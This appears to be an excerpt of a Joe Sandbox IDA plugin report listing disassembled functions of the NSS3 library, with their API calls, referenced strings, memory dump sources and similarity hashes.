                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E219376E0439A57FF00EA579C63F8F32749B9274FF0A0158E91AAF741E710B41886E6
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D14E4,6C53CC70), ref: 6C588D47
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C588D98
                                                                                                                                                                                                                                                        • Part of subcall function 6C460F00: PR_GetPageSize.NSS3(6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F1B
                                                                                                                                                                                                                                                        • Part of subcall function 6C460F00: PR_NewLogModule.NSS3(clock,6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F25
                                                                                                                                                                                                                                                      • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C588E7B
                                                                                                                                                                                                                                                      • htons.WSOCK32(?), ref: 6C588EDB
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C588F99
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C58910A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                                                                                                                                                                                      • String ID: %u.%u.%u.%u
                                                                                                                                                                                                                                                      • API String ID: 1845059423-1542503432
                                                                                                                                                                                                                                                      • Opcode ID: 83dd3624b8c341a02775f9efacd2464bfc654c1991f4bb963fe33b5b24379e6c
                                                                                                                                                                                                                                                      • Instruction ID: eb8c0580ef87859266ca774d845ad184403f38d12f5aacbe7b3772044d59c109
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83dd3624b8c341a02775f9efacd2464bfc654c1991f4bb963fe33b5b24379e6c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA027A3190B2718FDB18CF19CC6876ABBB3EF82304F19825AD8915FA91C731E949C791
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                      • String ID: %s %T already exists$authorizer malfunction$not authorized$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
                                                                                                                                                                                                                                                      • API String ID: 3168844106-1126224928
                                                                                                                                                                                                                                                      • Opcode ID: d94b5641098191c70452d2b0a407c6182c02a7fdc09034f707d0e23a4b0198b2
                                                                                                                                                                                                                                                      • Instruction ID: 9dfea458652964e73a28854e03e335769df228a911e7d2507d7915e929b9aedd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d94b5641098191c70452d2b0a407c6182c02a7fdc09034f707d0e23a4b0198b2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3729D70E452058FEB14CF69C480FAABBF1BF49308F1881BDD8159BB52D776A846CB94
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memcmp.VCRUNTIME140(?,00000000,6C3FC52B), ref: 6C529D53
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014960,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C52A035
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000149AD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C52A114
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_log$memcmp
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 717804543-598938438
                                                                                                                                                                                                                                                      • Opcode ID: b1d0a692fddf7eecc3e294a7704453a5486c4a982162ff8c8634db86f51754be
                                                                                                                                                                                                                                                      • Instruction ID: 723730643385e7fdf034668f1e6a0bccfa60947a629b804f28fd127659431238
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1d0a692fddf7eecc3e294a7704453a5486c4a982162ff8c8634db86f51754be
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10228E71608741DFC704CF29C89062ABBE1BFCA344F148A2DE9DA97791E739E845CB42
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6C408637,?,?), ref: 6C549E88
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6C408637), ref: 6C549ED6
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C549EC0
                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C549ECF
                                                                                                                                                                                                                                                      • database corruption, xrefs: 6C549ECA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 912837312-598938438
                                                                                                                                                                                                                                                      • Opcode ID: 20f9ff51cb4854e3302fabfd79bf8d05abf8f2803fc9c8d736391a4e2029c0ee
                                                                                                                                                                                                                                                      • Instruction ID: 2033139a644dabc422c872015ab20d846e2e96aee2537cee0ac1a9855340675d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20f9ff51cb4854e3302fabfd79bf8d05abf8f2803fc9c8d736391a4e2029c0ee
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C681C131B012159FCB04CF6ACD82EDEB3FAAF89304B148529E809AB745E731ED55CB90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C5581BC
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                                      • String ID: BINARY$out of memory
                                                                                                                                                                                                                                                      • API String ID: 2221118986-3971123528
                                                                                                                                                                                                                                                      • Opcode ID: adc490524459ab0239098d31e46cba62676770feff178ffe98c38120e3c9aa31
                                                                                                                                                                                                                                                      • Instruction ID: 0ed5863701637c5c72a672584e089f1493cc2ecf249ea2b58804f8b178949a15
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: adc490524459ab0239098d31e46cba62676770feff178ffe98c38120e3c9aa31
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3352CF71E15218DFDB04CF99C880BADBBB2FF48308F65816BD855AB751D730A856CB81
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6C4D9ED6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C4D9EE4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4D9F38
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DD030: PORT_NewArena_Util.NSS3(00000400,00000000,?,00000000,?,6C4D9F0B), ref: 6C4DD03B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DD030: PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C4DD04E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DD030: SECOID_FindOIDByTag_Util.NSS3(00000019), ref: 6C4DD07B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DD030: SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000), ref: 6C4DD08E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DD030: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4DD09D
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4D9F49
                                                                                                                                                                                                                                                      • SEC_PKCS7DestroyContentInfo.NSS3(?), ref: 6C4D9F59
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D9D60: PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C4D9C5B), ref: 6C4D9D82
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D9D60: PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C4D9C5B), ref: 6C4D9DA9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D9D60: PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C4D9C5B), ref: 6C4D9DCE
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D9D60: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C4D9C5B), ref: 6C4D9E43
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena$Alloc_Value$Arena_CriticalEnterErrorGrow_Mark_SectionUnlock$AllocateContentCopyDestroyFindFreeInfoItem_Tag_
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4287675220-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C58D086
                                                                                                                                                                                                                                                      • PR_Malloc.NSS3(00000001), ref: 6C58D0B9
                                                                                                                                                                                                                                                      • PR_Free.NSS3(?), ref: 6C58D138
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FreeMallocstrlen
                                                                                                                                                                                                                                                      • String ID: >
                                                                                                                                                                                                                                                      • API String ID: 1782319670-325317158
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: 0Xl$PXl$pXl$winUnlock$winUnlockReadLock
                                                                                                                                                                                                                                                      • API String ID: 0-3763817051
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C3F5001,?,00000003,00000000), ref: 6C51DFD7
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?,?,?,00000003,?,6C3F5001,?), ref: 6C51E2B7
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000028,00000003,?,?,?,?,?,?,00000003,?,6C3F5001,?), ref: 6C51E2DA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: memcpymemsetstrlen
                                                                                                                                                                                                                                                      • String ID: W
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C4E1052
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C4E1086
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: memcpy, memset
                                                                                                                                                                                                                                                      • String ID: h(Nl$h(Nl
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: 0Xl$PXl$pXl$winUnlockReadLock
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: sqlite_$sqlite_master$sqlite_temp_master
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: `
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: htonl
                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                      • API String ID: 2009864989-4108050209
                                                                                                                                                                                                                                                      • Opcode ID: febb16d6851d71d2a85959a04d55bc899c68e0da9d3be6e651c0407e470bdcf7
                                                                                                                                                                                                                                                      • Instruction ID: c79d42dea9a6150444622a4377f15423e0aee05e6fa30d5ca8b3a659235a88ce
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: febb16d6851d71d2a85959a04d55bc899c68e0da9d3be6e651c0407e470bdcf7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F514B33F490798ADB95457C88603FFFBB19F92318F184B29C5B1A7AC0C23545478BA2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C49F019
                                                                                                                                                                                                                                                      • PK11_GenerateRandom.NSS3(?,00000000), ref: 6C49F0F9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorGenerateK11_Random
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3009229198-0
                                                                                                                                                                                                                                                      • Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
                                                                                                                                                                                                                                                      • Instruction ID: 809931b612ec586eea2ccb5530e3f81d630c9c8a1c5f9de83fbd285a8c14a958
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F91A371E012268BDB14CF68C891EAEBBF1FF85324F14462DE56697BC0D730A905CB91
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6C4E7929), ref: 6C4C2FAC
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6C4E7929), ref: 6C4C2FE0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Error
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2619118453-0
                                                                                                                                                                                                                                                      • Opcode ID: 8b5c7d0f0ef03b8a6b17060c81cdbe4920eefee8d30fdc52c764c7c1c990b025
                                                                                                                                                                                                                                                      • Instruction ID: 34fd959a78b580e4b669fb69a48dee0d48226a71e59c818bd42528189841e04b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b5c7d0f0ef03b8a6b17060c81cdbe4920eefee8d30fdc52c764c7c1c990b025
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4151F37AB059118FD710CE5AC880FEA73B1FB4531AF254129D9099BB26CB31ED46CB83
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C4CEE3D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Alloc_ArenaUtil
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2062749931-0
                                                                                                                                                                                                                                                      • Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
                                                                                                                                                                                                                                                      • Instruction ID: a8788998a6fd76f563cbe1600050f283c24e53028c96ac3c35cd570e985233b8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7371E176F017018BD718CF19C8C1F6ABBF2AB88304F14862DD85A97BA1D734E901CB92
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000), ref: 6C3F6013
